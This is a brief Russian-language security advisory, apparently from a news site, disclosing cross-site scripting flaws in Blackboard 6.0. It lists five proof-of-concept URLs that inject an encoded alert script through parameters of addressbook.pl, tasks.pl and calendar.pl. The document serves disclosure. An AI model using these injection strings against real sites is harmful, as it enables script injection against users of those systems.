Программа: Blackboard 6.0 

Несколько уязвимостей обнаружено в Blackboard. Удаленный пользователь может выполнить XSS нападение. 

http://[victim]/bin/common/addressbook.pl?action= ADD&nav=my_addressbook&course=
'%3E%3Cscript%3Ealert('Vulnerable') %3C/script%3E

http://[victim]/bin/common/tasks.pl?action=c &display=T.subject&filter=--!!all&course_id=
&render_type='%3E%3Cscript%3Ealert('Vulnerable')%3C/

http
://[victim]/bin/common/calendar.pl?course_name =%22%3E%3Cscript%3Ealert('Vulnerable')
%3C/script%3E

http://[victim]/bin/common/calendar.pl?courseID =%22%3E%3Cscript%3Ealert('Vulnerable')
%3C/script%3E

http://[victim]/bin/common/calendar.pl?subroutine =%22%3E%3Cscript%3Ealert('Vulnerable')
%3C/script%3E

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии